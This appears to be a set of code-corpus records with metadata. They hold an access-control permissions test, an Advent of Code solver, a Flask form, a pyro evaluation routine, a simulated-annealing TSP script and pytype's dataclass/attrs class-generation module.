    return rbac_factory(self.people[role].id, technical_leads, parent)

  # NOTE(review): the docstring below appears to serve as the name/format
  # template for the generated test cases -- confirm before rewording it.
  @helpers.unwrap(PERMISSIONS)
  def test_access(self, role, model, action_name, expected_result):
    """Technical Leads {0:<7}: On {1:<20} test {2:<20} - Expected {3:<2} """
    self.runtest(role, model, action_name, expected_result)
|
<filename>test/integration/ggrc/access_control/acl_propagation/test_one_rank_technical_leads.py
# Copyright (C) 2019 Google Inc.
# Licensed under http://www.apache.org/licenses/LICENSE-2.0 <see LICENSE file>
"""Test Access Control roles Technical Leads propagation"""
import ddt
from ggrc.models import all_models
from integration.ggrc.access_control import rbac_factories
from integration.ggrc.access_control.acl_propagation import base
from integration.ggrc.utils import helpers
@ddt.ddt
class TestTechnicalLeadsPropagation(base.TestACLPropagation):
  """Test Technical Leads role permissions propagation.

  These tests differ from the other ACR tests in the acl_propagation
  package because the document is mapped to the parent directly (one
  rank), e.g. Control -> document.Reference URL, checking that the
  parent's role holder can read/create etc. the document and its
  comments.
  """

  # Expected outcome of every (global role, parent model, action)
  # combination; helpers.unwrap expands this into parametrized cases.
  PERMISSIONS = {
      "Creator": {
          "Universal KeyReport": {
              "create_and_map_document": True,
              "read_document": True,
              "update_document": True,
              "delete_document": False,
              "create_and_map_comment": True,
              "read_comment": True,
              "create_and_map_document_comment": True,
              "read_document_comment": True,
          },
          "Universal AccountBalance": {
              "create_and_map_document": True,
              "read_document": True,
              "update_document": True,
              "delete_document": False,
              "create_and_map_comment": True,
              "read_comment": True,
              "create_and_map_document_comment": True,
              "read_document_comment": True,
          },
      },
      "Reader": {
          "Universal KeyReport": {
              "create_and_map_document": True,
              "read_document": True,
              "update_document": True,
              "delete_document": False,
              "create_and_map_comment": True,
              "read_comment": True,
              "create_and_map_document_comment": True,
              "read_document_comment": True,
          },
          "Universal AccountBalance": {
              "create_and_map_document": True,
              "read_document": True,
              "update_document": True,
              "delete_document": False,
              "create_and_map_comment": True,
              "read_comment": True,
              "create_and_map_document_comment": True,
              "read_document_comment": True,
          },
      },
      "Editor": {
          "Universal KeyReport": {
              "create_and_map_document": True,
              "read_document": True,
              "update_document": True,
              "delete_document": False,
              "create_and_map_comment": True,
              "read_comment": True,
              "create_and_map_document_comment": True,
              "read_document_comment": True,
          },
          "Universal AccountBalance": {
              "create_and_map_document": True,
              "read_document": True,
              "update_document": True,
              "delete_document": False,
              "create_and_map_comment": True,
              "read_comment": True,
              "create_and_map_document_comment": True,
              "read_document_comment": True,
          },
      },
  }

  def init_factory(self, role, model, parent):
    """Initialize RBAC factory with propagated Technical Leads role.

    Args:
        role: Global Custom role that user have (Creator/Reader/Editor).
        model: Model name for which factory should be got.
        parent: Model name in scope of which objects should be installed.

    Returns:
        Initialized RBACFactory object.
    """
    self.setup_people()
    # Fetch the "Technical Leads" ACR declared for the parent object type.
    technical_leads = all_models.AccessControlRole.query.filter_by(
        name="Technical Leads",
        object_type=parent,
    ).first()
    rbac_factory = rbac_factories.TEST_FACTORIES_MAPPING[model]
    return rbac_factory(self.people[role].id, technical_leads, parent)

  # NOTE(review): the docstring below appears to serve as the name/format
  # template for the generated test cases -- confirm before rewording it.
  @helpers.unwrap(PERMISSIONS)
  def test_access(self, role, model, action_name, expected_result):
    """Technical Leads {0:<7}: On {1:<20} test {2:<20} - Expected {3:<2} """
    self.runtest(role, model, action_name, expected_result)
|
en
| 0.823863
|
# Copyright (C) 2019 Google Inc. # Licensed under http://www.apache.org/licenses/LICENSE-2.0 <see LICENSE file> Test Access Control roles Technical Leads propagation Test Technical Leads role permissions propagation This tests are different from other ACR test in acr_propagation package because we map document to parent directly (one rank) e.g Control -> with document.Reference URL and check that Control's Admin can read/create etc document and its comments. Initialize RBAC factory with propagated Technical Leads role. Args: role: Global Custom role that user have (Creator/Reader/Editor). model: Model name for which factory should be got. parent: Model name in scope of which objects should be installed. Returns: Initialized RBACFactory object. Technical Leads {0:<7}: On {1:<20} test {2:<20} - Expected {3:<2}
| 2.063493
| 2
|
python/day03/binary_diagnostic.py
|
aesdeef/advent-of-code-2021
| 2
|
6628130
|
from collections import Counter
from typing import Callable, Iterable
INPUT_FILE = "../../input/03.txt"
def parse_input() -> list[str]:
    """
    Reads the puzzle input and returns the binary entries, one per line.
    """
    with open(INPUT_FILE) as handle:
        return [entry.strip() for entry in handle]
def more_common_bit(bits: Iterable[str]) -> str:
    """
    Returns the more common bit, preferring "1" when both are equally
    common.
    """
    counts = Counter(bits)
    if counts["1"] >= counts["0"]:
        return "1"
    return "0"
def less_common_bit(bits: Iterable[str]) -> str:
    """
    Returns the less common bit, preferring "0" when both are equally
    common.
    """
    counts = Counter(bits)
    if counts["1"] >= counts["0"]:
        return "0"
    return "1"
def multiply_binary(first: str, second: str) -> int:
    """
    Interprets both strings as base-2 numbers and returns their product.
    """
    return int(first, base=2) * int(second, base=2)
def solve_part1(data: list[str]) -> int:
    """
    Finds the power consumption: gamma (most common bit per column)
    multiplied by epsilon (least common bit per column).
    """
    columns = list(zip(*data))
    gamma = "".join(more_common_bit(column) for column in columns)
    epsilon = "".join(less_common_bit(column) for column in columns)
    return multiply_binary(gamma, epsilon)
def find_rating(data: list[str], keep_condition: Callable[[list[str]], str]) -> str:
    """
    Finds the rating by going through each bit position and keeping only
    those entries whose ith bit matches the bit returned by the
    keep_condition function, until a single entry remains.

    Raises ValueError if no single entry survives the filtering.
    """
    for i in range(len(data[0])):
        bits = [entry[i] for entry in data]
        # Evaluate the keep condition once per position; the original
        # called it inside the filter for every entry, re-counting the
        # same column O(n) times.
        wanted = keep_condition(bits)
        data = [entry for entry in data if entry[i] == wanted]
        if len(data) == 1:
            return data[0]
    raise ValueError("could not find the rating")
def solve_part2(data: list[str]) -> int:
    """
    Finds the life support rating: the oxygen generator rating times the
    CO2 scrubber rating.
    """
    oxygen = find_rating(data, more_common_bit)
    co2 = find_rating(data, less_common_bit)
    return multiply_binary(oxygen, co2)
if __name__ == "__main__":
    # Script entry point: read the diagnostic report, solve both parts
    # and print the answers, one per line.
    data = parse_input()
    part1 = solve_part1(data)
    part2 = solve_part2(data)
    print(part1)
    print(part2)
|
from collections import Counter
from typing import Callable, Iterable
INPUT_FILE = "../../input/03.txt"
def parse_input() -> list[str]:
    """
    Reads the puzzle input and returns the binary entries, one per line.
    """
    with open(INPUT_FILE) as handle:
        return [entry.strip() for entry in handle]
def more_common_bit(bits: Iterable[str]) -> str:
    """
    Returns the more common bit, preferring "1" when both are equally
    common.
    """
    counts = Counter(bits)
    if counts["1"] >= counts["0"]:
        return "1"
    return "0"
def less_common_bit(bits: Iterable[str]) -> str:
    """
    Returns the less common bit, preferring "0" when both are equally
    common.
    """
    counts = Counter(bits)
    if counts["1"] >= counts["0"]:
        return "0"
    return "1"
def multiply_binary(first: str, second: str) -> int:
    """
    Interprets both strings as base-2 numbers and returns their product.
    """
    return int(first, base=2) * int(second, base=2)
def solve_part1(data: list[str]) -> int:
    """
    Finds the power consumption: gamma (most common bit per column)
    multiplied by epsilon (least common bit per column).
    """
    columns = list(zip(*data))
    gamma = "".join(more_common_bit(column) for column in columns)
    epsilon = "".join(less_common_bit(column) for column in columns)
    return multiply_binary(gamma, epsilon)
def find_rating(data: list[str], keep_condition: Callable[[list[str]], str]) -> str:
    """
    Finds the rating by going through each bit position and keeping only
    those entries whose ith bit matches the bit returned by the
    keep_condition function, until a single entry remains.

    Raises ValueError if no single entry survives the filtering.
    """
    for i in range(len(data[0])):
        bits = [entry[i] for entry in data]
        # Evaluate the keep condition once per position; the original
        # called it inside the filter for every entry, re-counting the
        # same column O(n) times.
        wanted = keep_condition(bits)
        data = [entry for entry in data if entry[i] == wanted]
        if len(data) == 1:
            return data[0]
    raise ValueError("could not find the rating")
def solve_part2(data: list[str]) -> int:
    """
    Finds the life support rating: the oxygen generator rating times the
    CO2 scrubber rating.
    """
    oxygen = find_rating(data, more_common_bit)
    co2 = find_rating(data, less_common_bit)
    return multiply_binary(oxygen, co2)
if __name__ == "__main__":
    # Script entry point: read the diagnostic report, solve both parts
    # and print the answers, one per line.
    data = parse_input()
    part1 = solve_part1(data)
    part2 = solve_part2(data)
    print(part1)
    print(part2)
|
en
| 0.935407
|
Parses the data and returns a list of binary entries Returns the more common bit or "1" if both are equally common Returns the less common bit or "0" if both are equally common Parses two strings representing binary numbers and multiplies them Finds the solution to part 1 (the power consumption of the submarine) Finds the rating by going through each bit position and keeping only those entries where the ith bit matches the one returned by the keep_condition function Finds the solution to part 2 (the life support rating of the submarine)
| 3.847565
| 4
|
shopyo/modules/box__bizhelp/page/forms.py
|
Bnseamster/shopyo
| 23
|
6628131
|
from flask_wtf import FlaskForm
# from wtforms.validators import Length
# from wtforms.fields.html5 import EmailField
from wtforms import StringField
from wtforms import TextAreaField
from wtforms.validators import DataRequired
from shopyoapi.validators import verify_slug
class PageForm(FlaskForm):
    """Form for creating or editing a static page.

    Fields: optional free-form content, a required validated slug, and a
    required title.  Field declaration order determines render order.
    """
    # Page body; no validators, rendered as a 20-row textarea.
    content = TextAreaField(
        "Content",
        [],
        render_kw={
            "class": "form-control",
            "rows": "20",
            "autocomplete": "off",
        },
    )
    # URL fragment for the page; required and checked by verify_slug.
    slug = StringField(
        "Slug",
        [DataRequired(), verify_slug],
        render_kw={"class": "form-control", "autocomplete": "off"},
    )
    # Page title; required.
    title = StringField(
        "Title",
        [DataRequired()],
        render_kw={"class": "form-control", "autocomplete": "off"},
    )
|
from flask_wtf import FlaskForm
# from wtforms.validators import Length
# from wtforms.fields.html5 import EmailField
from wtforms import StringField
from wtforms import TextAreaField
from wtforms.validators import DataRequired
from shopyoapi.validators import verify_slug
class PageForm(FlaskForm):
    """Form for creating or editing a static page.

    Fields: optional free-form content, a required validated slug, and a
    required title.  Field declaration order determines render order.
    """
    # Page body; no validators, rendered as a 20-row textarea.
    content = TextAreaField(
        "Content",
        [],
        render_kw={
            "class": "form-control",
            "rows": "20",
            "autocomplete": "off",
        },
    )
    # URL fragment for the page; required and checked by verify_slug.
    slug = StringField(
        "Slug",
        [DataRequired(), verify_slug],
        render_kw={"class": "form-control", "autocomplete": "off"},
    )
    # Page title; required.
    title = StringField(
        "Title",
        [DataRequired()],
        render_kw={"class": "form-control", "autocomplete": "off"},
    )
|
en
| 0.619884
|
# from wtforms.validators import Length # from wtforms.fields.html5 import EmailField
| 2.195665
| 2
|
src/evaluate.py
|
jadeleiyu/noun2verb
| 0
|
6628132
|
<gh_stars>0
from pyro.infer.predictive import Predictive
from data_prep import prepare_data
def evaluate(generator, eval_data_loader, vocab, sample_size, batch_size):
    """Sample predicates/relations from the guide posterior for every
    batch in *eval_data_loader* and collect them next to the gold labels.

    Args:
        generator: object exposing pyro-compatible ``model`` and ``guide``.
        eval_data_loader: sized iterable yielding (subs, objs, targets,
            relations, predicates) batches.
        vocab: vocabulary with an ``i2w`` index-to-word mapping.
        sample_size: number of posterior samples drawn per example.
        batch_size: number of examples per batch.

    Returns:
        Dict of parallel lists: inputs, gold labels, and the lists of
        sampled predicate/relation words per example.
    """
    predict_fn = Predictive(generator.model, generator.guide, num_samples=sample_size, return_sites=('v', 'r', 'z'))
    # BUG FIX: integer division -- '/' yields a float in Py3, and
    # range(float) raises TypeError.
    num_batches = len(eval_data_loader) // batch_size
    eval_iter = iter(eval_data_loader)
    predict_df = {
        'subject': [],
        'object': [],
        'target': [],
        'true predicate': [],
        'true relation': [],
        'predicted predicates': [],
        # BUG FIX: key was misspelled 'predicted relaitons', so the
        # appends below raised KeyError on the first batch.
        'predicted relations': []
    }
    for i in range(num_batches):
        subs, objs, targets, relations, predicates = next(eval_iter)
        for j in range(batch_size):
            predict_df['subject'].append(subs[j])
            predict_df['object'].append(objs[j])
            predict_df['target'].append(targets[j])
            predict_df['true predicate'].append(predicates[j])
            predict_df['true relation'].append(relations[j])
        subs, objs, targets, relations, predicates = prepare_data(subs, objs, targets, relations, predicates, vocab)
        # Run the (expensive) predictive pass once and reuse it for both
        # sites; the original ran it twice, drawing inconsistent samples
        # for 'v' and 'r'.
        samples = predict_fn(subs, objs, targets, relations, predicates)
        batch_pred_samples = samples['v'].view(batch_size, -1)
        batch_rel_samples = samples['r'].view(batch_size, -1)
        assert batch_pred_samples.shape[-1] == sample_size and batch_rel_samples.shape[-1] == sample_size
        for j in range(batch_size):
            # 'sample_size' sampled predicates and relations per example,
            # drawn from the guide posterior
            sampled_predicates_idx = batch_pred_samples[j]
            sampled_rel_idx = batch_rel_samples[j]
            sampled_predicates = [vocab.i2w[pred_idx_tensor.item()] for pred_idx_tensor in sampled_predicates_idx]
            sampled_relations = [vocab.i2w[rel_idx_tensor.item()] for rel_idx_tensor in sampled_rel_idx]
            predict_df['predicted predicates'].append(sampled_predicates)
            predict_df['predicted relations'].append(sampled_relations)
    return predict_df
|
from pyro.infer.predictive import Predictive
from data_prep import prepare_data
def evaluate(generator, eval_data_loader, vocab, sample_size, batch_size):
    """Sample predicates/relations from the guide posterior for every
    batch in *eval_data_loader* and collect them next to the gold labels.

    Args:
        generator: object exposing pyro-compatible ``model`` and ``guide``.
        eval_data_loader: sized iterable yielding (subs, objs, targets,
            relations, predicates) batches.
        vocab: vocabulary with an ``i2w`` index-to-word mapping.
        sample_size: number of posterior samples drawn per example.
        batch_size: number of examples per batch.

    Returns:
        Dict of parallel lists: inputs, gold labels, and the lists of
        sampled predicate/relation words per example.
    """
    predict_fn = Predictive(generator.model, generator.guide, num_samples=sample_size, return_sites=('v', 'r', 'z'))
    # BUG FIX: integer division -- '/' yields a float in Py3, and
    # range(float) raises TypeError.
    num_batches = len(eval_data_loader) // batch_size
    eval_iter = iter(eval_data_loader)
    predict_df = {
        'subject': [],
        'object': [],
        'target': [],
        'true predicate': [],
        'true relation': [],
        'predicted predicates': [],
        # BUG FIX: key was misspelled 'predicted relaitons', so the
        # appends below raised KeyError on the first batch.
        'predicted relations': []
    }
    for i in range(num_batches):
        subs, objs, targets, relations, predicates = next(eval_iter)
        for j in range(batch_size):
            predict_df['subject'].append(subs[j])
            predict_df['object'].append(objs[j])
            predict_df['target'].append(targets[j])
            predict_df['true predicate'].append(predicates[j])
            predict_df['true relation'].append(relations[j])
        subs, objs, targets, relations, predicates = prepare_data(subs, objs, targets, relations, predicates, vocab)
        # Run the (expensive) predictive pass once and reuse it for both
        # sites; the original ran it twice, drawing inconsistent samples
        # for 'v' and 'r'.
        samples = predict_fn(subs, objs, targets, relations, predicates)
        batch_pred_samples = samples['v'].view(batch_size, -1)
        batch_rel_samples = samples['r'].view(batch_size, -1)
        assert batch_pred_samples.shape[-1] == sample_size and batch_rel_samples.shape[-1] == sample_size
        for j in range(batch_size):
            # 'sample_size' sampled predicates and relations per example,
            # drawn from the guide posterior
            sampled_predicates_idx = batch_pred_samples[j]
            sampled_rel_idx = batch_rel_samples[j]
            sampled_predicates = [vocab.i2w[pred_idx_tensor.item()] for pred_idx_tensor in sampled_predicates_idx]
            sampled_relations = [vocab.i2w[rel_idx_tensor.item()] for rel_idx_tensor in sampled_rel_idx]
            predict_df['predicted predicates'].append(sampled_predicates)
            predict_df['predicted relations'].append(sampled_relations)
    return predict_df
|
en
| 0.769685
|
# there're 'sample_size' sampled predicates and relations from the guide posterior
| 2.221261
| 2
|
schedule_booking/apps.py
|
matteli/pop
| 0
|
6628133
|
from django.apps import AppConfig
class ScheduleBookingConfig(AppConfig):
    """Django application configuration for the schedule_booking app."""
    name = 'schedule_booking'
|
from django.apps import AppConfig
class ScheduleBookingConfig(AppConfig):
    """Django application configuration for the schedule_booking app."""
    name = 'schedule_booking'
|
none
| 1
| 1.167336
| 1
|
|
sample_app/boards/features/steps/board_steps.py
|
CCE-IT/cce-toolkit
| 8
|
6628134
|
<reponame>CCE-IT/cce-toolkit
from toolkit.helpers.bdd.shared_steps import *
|
from toolkit.helpers.bdd.shared_steps import *
|
none
| 1
| 1.020288
| 1
|
|
3IntelligentOptimization/TSP_SA.py
|
intLyc/Undergraduate-Courses
| 0
|
6628135
|
<reponame>intLyc/Undergraduate-Courses
"""
@author: zll
description:
模拟退火算法求解TSP
"""
import random
import time
import math
# Annealing parameters.
T0 = 50000.0 # initial temperature
T_min = 1e-8 # stop cooling once the temperature drops below this
q = 0.98 # cooling coefficient: T <- q * T after each temperature level
K = 1 # the constant K in the acceptance formula
L = 1000 # intended iterations per temperature (chain length); NOTE(review): SA() actually iterates N times per temperature — confirm which is intended
N = 52 # number of cities
# berlin52 benchmark instance: 52 city coordinates
city = [
    [565, 575], [25, 185], [345, 750], [945, 685], [845, 655],
    [880, 660], [25, 230], [525, 1000], [580, 1175], [650, 1130],
    [1605, 620], [1220, 580], [1465, 200], [1530, 5],
    [845, 680], [725, 370], [145, 665],
    [415, 635], [510, 875], [560, 365], [300, 465], [520, 585], [480, 415],
    [835, 625], [975, 580], [1215, 245], [1320, 315], [1250, 400], [660, 180],
    [410, 250], [420, 555], [575, 665], [1150, 1160], [700, 580], [685, 595],
    [685, 610], [770, 610], [795, 645], [720, 635], [760, 650], [475, 960],
    [95, 260], [875, 920], [700, 500], [555, 815], [830, 485], [1170, 65],
    [830, 610], [605, 625], [595, 360], [1340, 725], [1740, 245]
]
def cal_distance(id1, id2, points=None):
    """Return the Euclidean distance between two cities.

    Args:
        id1: index of the first city.
        id2: index of the second city.
        points: optional list of [x, y] coordinates; defaults to the
            module-level ``city`` table (backward compatible).

    Returns:
        The straight-line distance as a float.
    """
    pts = city if points is None else points
    # math.hypot is the idiomatic, numerically robust Euclidean norm.
    return math.hypot(pts[id1][0] - pts[id2][0], pts[id1][1] - pts[id2][1])
def path_len(city_list):
    """Total length of the closed tour described by city_list.

    Expects a route of N + 1 city indices (the tour returns to its start),
    and sums the N leg distances.
    """
    return sum(cal_distance(city_list[k], city_list[k + 1]) for k in range(N))
def SA():
    """Solve the TSP instance in ``city`` by simulated annealing.

    Returns:
        dict with 'cost' (best tour length found) and 'route' (a list of
        N + 1 city indices starting and ending at city 0).
    """
    def creat_new(city_list):
        # Neighbour move: swap two distinct positions; position 0 is never
        # touched so the tour keeps starting (and ending) at city 0.
        new_list = city_list[:]
        i = random.randint(1, N - 1)
        j = random.randint(1, N - 1)
        while j == i:
            j = random.randint(1, N - 1)
        new_list[i], new_list[j] = new_list[j], new_list[i]
        return new_list
    count = 0  # number of cooling steps performed
    # Initial solution: visit cities in index order, then return to city 0.
    best_route = list(range(N))
    best_route.append(0)
    best = path_len(best_route)
    T = T0
    while T > T_min:
        # NOTE(review): the chain length here is N, not the configured L —
        # confirm which was intended (main() reports L as the per-temperature
        # iteration count).
        for _ in range(N):
            new_route = creat_new(best_route)
            new = path_len(new_route)
            delta = new - best
            if delta < 0:
                # Strictly better tour: always accept.
                best_route = new_route[:]
                best = new
            else:
                # Metropolis criterion: accept a worse tour with probability
                # exp(-delta / (K * T)).  BUGFIX: the original tested
                # exp(+delta/(K*T)) < r, which is never true for delta >= 0
                # (exp(+x) >= 1 > r), so worse moves were never accepted and
                # the search degenerated to pure hill climbing.  The negative
                # exponent also cannot overflow, so no guard is needed.
                if random.random() < math.exp(-delta / (K * T)):
                    best_route = new_route[:]
                    best = new
        T *= q
        count += 1
    print("共降温", count, "次,当前满意解为", best)
    result = dict()
    result['cost'] = best
    result['route'] = best_route
    return result
def main():
    """Run the solver once, record the wall-clock time, and print results."""
    started_at = time.time()
    outcome = SA()
    outcome['time'] = time.time() - started_at
    print("初始温度T0=", T0, ",降温系数q=", q, ",每个温度迭代", L, "次")
    print(outcome)
if __name__ == '__main__':
    main()
|
"""
@author: zll
description:
模拟退火算法求解TSP
"""
import random
import time
import math
T0 = 50000.0 # 初始温度
T_min = 1e-8
q = 0.98 # 退火系数
K = 1 # 公式中的常数K
L = 1000 # 每个温度时的迭代次数,即链长
N = 52 # 城市数量
# 柏林52城算例
city = [
[565, 575], [25, 185], [345, 750], [945, 685], [845, 655],
[880, 660], [25, 230], [525, 1000], [580, 1175], [650, 1130],
[1605, 620], [1220, 580], [1465, 200], [1530, 5],
[845, 680], [725, 370], [145, 665],
[415, 635], [510, 875], [560, 365], [300, 465], [520, 585], [480, 415],
[835, 625], [975, 580], [1215, 245], [1320, 315], [1250, 400], [660, 180],
[410, 250], [420, 555], [575, 665], [1150, 1160], [700, 580], [685, 595],
[685, 610], [770, 610], [795, 645], [720, 635], [760, 650], [475, 960],
[95, 260], [875, 920], [700, 500], [555, 815], [830, 485], [1170, 65],
[830, 610], [605, 625], [595, 360], [1340, 725], [1740, 245]
]
def cal_distance(id1, id2):
distance = math.sqrt((city[id1][0] - city[id2][0])
** 2 + (city[id1][1] - city[id2][1])**2)
return distance
def path_len(city_list):
path = 0
for i in range(N):
path += cal_distance(city_list[i], city_list[i + 1])
return path
def SA():
def creat_new(city_list):
new_list = city_list[:]
i = random.randint(1, N - 1)
j = random.randint(1, N - 1)
while j == i:
j = random.randint(1, N - 1)
temp = new_list[i]
new_list[i] = new_list[j]
new_list[j] = temp
return new_list
count = 0
best_route = [] # 全局最优解
for i in range(N):
best_route.append(i)
best_route.append(0)
best = path_len(best_route)
T = T0
while T > T_min:
for i in range(N):
new_route = creat_new(best_route)
new = path_len(new_route)
delta = new - best
if delta < 0:
best_route = new_route[:]
best = new
else:
r = random.random()
if delta / (K * T) < 500 and math.exp(delta / (K * T)) < r:
best_route = new_route[:]
best = new
T *= q
count += 1
print("共降温", count, "次,当前满意解为", best)
result = dict()
result['cost'] = best
result['route'] = best_route
return result
def main():
start = time.time()
result = SA()
end = time.time()
duration = end - start
result['time'] = duration
print("初始温度T0=", T0, ",降温系数q=", q, ",每个温度迭代", L, "次")
print(result)
if __name__ == '__main__':
main()
|
zh
| 0.923902
|
@author: zll
description:
模拟退火算法求解TSP # 初始温度 # 退火系数 # 公式中的常数K # 每个温度时的迭代次数,即链长 # 城市数量 # 柏林52城算例 # 全局最优解
| 2.468331
| 2
|
pytype/overlays/classgen.py
|
OrBin/pytype
| 0
|
6628136
|
<reponame>OrBin/pytype<filename>pytype/overlays/classgen.py
"""Base support for generating classes from data declarations.
Contains common functionality used by dataclasses, attrs and namedtuples.
"""
import abc
import collections
import logging
from pytype import abstract
from pytype import abstract_utils
from pytype import mixin
from pytype import overlay_utils
from pytype import special_builtins
import six
log = logging.getLogger(__name__)
# type alias for convenience
Param = overlay_utils.Param
class Ordering(object):
  """Possible orderings for Decorator.get_class_locals.

  Each ordering is an opaque sentinel object; compare with ``is``.
  """
  # Order by each variable's first annotation. For example, for
  #   class Foo:
  #     x: int
  #     y: str
  #     x: float
  # the locals will be [(x, Instance(float)), (y, Instance(str))]. Note that
  # unannotated variables will be skipped, and the values of later annotations
  # take precedence over earlier ones.
  FIRST_ANNOTATE = object()
  # Order by each variable's last definition. So for
  #   class Foo:
  #     x = 0
  #     y = 'hello'
  #     x = 4.2
  # the locals will be [(y, Instance(str)), (x, Instance(float))]. Note that
  # variables without assignments will be skipped.
  LAST_ASSIGN = object()
class Attribute(object):
  """A single member variable of a generated class.

  Attributes:
    name: field name
    typ: field python type
    init: whether the field appears in the generated __init__
    default: default value
  """

  def __init__(self, name, typ, init, default):
    self.name = name
    self.typ = typ
    self.init = init
    self.default = default

  def __repr__(self):
    summary = {"name": self.name, "typ": self.typ, "init": self.init,
               "default": self.default}
    return str(summary)
@six.add_metaclass(abc.ABCMeta)
class Decorator(abstract.PyTDFunction):
  """Base class for decorators that generate classes from data declarations."""
  # Defaults for the args that we support (dataclasses only support 'init',
  # but the others default to false so they should not affect anything).
  _DEFAULT_ARGS = {
      "init": True,
      "kw_only": False,
      "auto_attribs": False,
  }
  def __init__(self, *args, **kwargs):
    super(Decorator, self).__init__(*args, **kwargs)
    # Decorator.call() is invoked first with args, then with the class to
    # decorate, so we need to first store the args and then associate them to
    # the right class.
    self._current_args = None
    self.args = {} # map from each class we decorate to its args
  @abc.abstractmethod
  def decorate(self, node, cls):
    """Apply the decorator to cls."""
  def update_kwargs(self, args):
    """Record the decorator's keyword args, resolved to python constants.

    Starts from _DEFAULT_ARGS; unknown keywords are silently ignored, and
    non-constant values are reported via the error log.
    """
    self._current_args = Decorator._DEFAULT_ARGS.copy()
    for k, v in args.namedargs.items():
      if k in self._current_args:
        try:
          self._current_args[k] = abstract_utils.get_atomic_python_constant(v)
        except abstract_utils.ConversionError:
          self.vm.errorlog.not_supported_yet(
              self.vm.frames, "Non-constant argument to decorator: %r" % k)
  def init_name(self, attr):
    """Attribute name as an __init__ keyword, could differ from attr.name."""
    return attr.name
  def make_init(self, node, cls, attrs):
    """Build an __init__ method for cls from the given Attribute list.

    Only attrs with init=True become parameters; with kw_only (py3) they are
    emitted as keyword-only parameters.
    """
    attr_params = []
    for attr in attrs:
      if attr.init:
        # call self.init_name in case the name differs from the field name -
        # e.g. attrs removes leading underscores from attrib names when
        # generating kwargs for __init__.
        attr_params.append(
            Param(name=self.init_name(attr),
                  typ=attr.typ,
                  default=attr.default))
    # The kw_only arg is ignored in python2; using it is not an error.
    if self.args[cls]["kw_only"] and self.vm.PY3:
      params = []
      kwonly_params = attr_params
    else:
      params = attr_params
      kwonly_params = []
    return overlay_utils.make_method(self.vm, node, "__init__", params,
                                     kwonly_params)
  def type_clash_error(self, value):
    """Report an invalid-annotation error for a conflicting member value."""
    if is_late_annotation(value):
      err = value.expr
    else:
      err = value.data[0].cls
    self.vm.errorlog.invalid_annotation(self.vm.frames, err)
  def get_class_locals(self, cls, allow_methods, ordering):
    """Gets a dictionary of the class's local variables.
    Args:
      cls: An abstract.InterpreterClass.
      allow_methods: A bool, whether to allow methods as variables.
      ordering: A classgen.Ordering describing the order in which the variables
        should appear.
    Returns:
      A collections.OrderedDict of the locals.
    """
    # TODO(rechen): Once we drop Python 2 support, either use a normal dict or
    # replace key deletion with OrderedDict.move_to_end().
    out = collections.OrderedDict()
    for op in self.vm.local_ops[cls.name]:
      if is_dunder(op.name):
        continue
      local = self.vm.annotated_locals[cls.name][op.name]
      if not allow_methods and is_method(local.orig):
        continue
      if ordering is Ordering.FIRST_ANNOTATE:
        if not op.is_annotate() or op.name in out:
          continue
      else:
        assert ordering is Ordering.LAST_ASSIGN
        if not op.is_assign():
          continue
        elif op.name in out:
          # Re-assignment: delete and re-insert so the name moves to the end,
          # giving last-assignment ordering.
          del out[op.name]
      out[op.name] = local
    return out
  def add_member(self, node, cls, name, value, orig):
    """Adds a class member, returning whether it's a bare late annotation."""
    if not is_late_annotation(value):
      cls.members[name] = value
      return False
    elif orig is None:
      # We are generating a class member from a bare annotation.
      cls.members[name] = self.vm.convert.none.to_variable(node)
      cls.late_annotations[name] = value
      return True
    else:
      cls.members[name] = orig
      return False
  def get_base_class_attrs(self, cls, cls_attrs, metadata_key):
    """Collect inherited attributes from base classes, oldest-wins.

    Skips any base-class attribute whose name is already present in
    cls_attrs or in an earlier (closer) base.
    """
    # Traverse the MRO and collect base class attributes. We only add an
    # attribute if it hasn't been defined before.
    base_attrs = []
    taken_attr_names = {a.name for a in cls_attrs}
    for base_cls in cls.mro[1:]:
      if not isinstance(base_cls, mixin.Class):
        continue
      sub_attrs = base_cls.metadata.get(metadata_key, None)
      if sub_attrs is None:
        continue
      for a in sub_attrs:
        if a.name not in taken_attr_names:
          taken_attr_names.add(a.name)
          base_attrs.append(a)
    return base_attrs
  def call(self, node, func, args):
    """Construct a decorator, and call it on the class."""
    self.match_args(node, args)
    # There are two ways to use a decorator:
    #   @decorator(...)
    #   class Foo: ...
    # or
    #   @decorator
    #   class Foo: ...
    # In the first case, call() is invoked twice: once with kwargs to create the
    # decorator object and once with the decorated class as a posarg. So we call
    # update_kwargs on the first invocation, setting _current_args, and skip it
    # on the second.
    # In the second case, we call update_kwargs on the first and only
    # invocation. (Although namedargs is empty in this case, bool(namedargs) is
    # True as long as namedargs is an abstract.Dict object.)
    if args.namedargs and not self._current_args:
      self.update_kwargs(args)
    # NOTE: @dataclass is py3-only and has explicitly kwonly args in its
    # constructor.
    #
    # @attr.s does not take positional arguments in typical usage, but
    # technically this works:
    #   class Foo:
    #     x = attr.ib()
    #   Foo = attr.s(Foo, **kwargs)
    #
    # Unfortunately, it also works to pass kwargs as posargs; we will at least
    # reject posargs if the first arg is not a Callable.
    if not args.posargs:
      return node, self.to_variable(node)
    cls_var = args.posargs[0]
    # We should only have a single binding here
    cls, = cls_var.data
    if not isinstance(cls, mixin.Class):
      # There are other valid types like abstract.Unsolvable that we don't need
      # to do anything with.
      return node, cls_var
    self.args[cls] = self._current_args
    # Reset _current_args so we don't use old args for a new class.
    self._current_args = None
    # decorate() modifies the cls object in place
    self.decorate(node, cls)
    return node, cls_var
class FieldConstructor(abstract.PyTDFunction):
  """Implements constructors for fields."""

  def get_kwarg(self, args, name, default):
    """Return the constant value of keyword arg `name`, or `default`."""
    if name in args.namedargs:
      try:
        return abstract_utils.get_atomic_python_constant(args.namedargs[name])
      except abstract_utils.ConversionError:
        self.vm.errorlog.not_supported_yet(
            self.vm.frames, "Non-constant argument %r" % name)
        # Falls through and implicitly returns None, as before.
    else:
      return default

  def get_type_from_default(self, node, default_var):
    """Derive a field's type variable from its default value's variable."""
    if not default_var or default_var.data != [self.vm.convert.none]:
      return default_var
    # A default of None doesn't give us any information about the actual type.
    return self.vm.program.NewVariable([self.vm.convert.unsolvable],
                                       [default_var.bindings[0]], node)
def is_method(var):
  """True if `var` holds a method-like value (function, property, etc.)."""
  if var is None or is_late_annotation(var):
    return False
  method_types = (
      abstract.INTERPRETER_FUNCTION_TYPES,
      special_builtins.ClassMethodInstance,
      special_builtins.PropertyInstance,
      special_builtins.StaticMethodInstance,
  )
  return isinstance(var.data[0], method_types)
def is_late_annotation(val):
  """True if `val` is a not-yet-resolved (late) type annotation."""
  return isinstance(val, abstract.LateAnnotation)
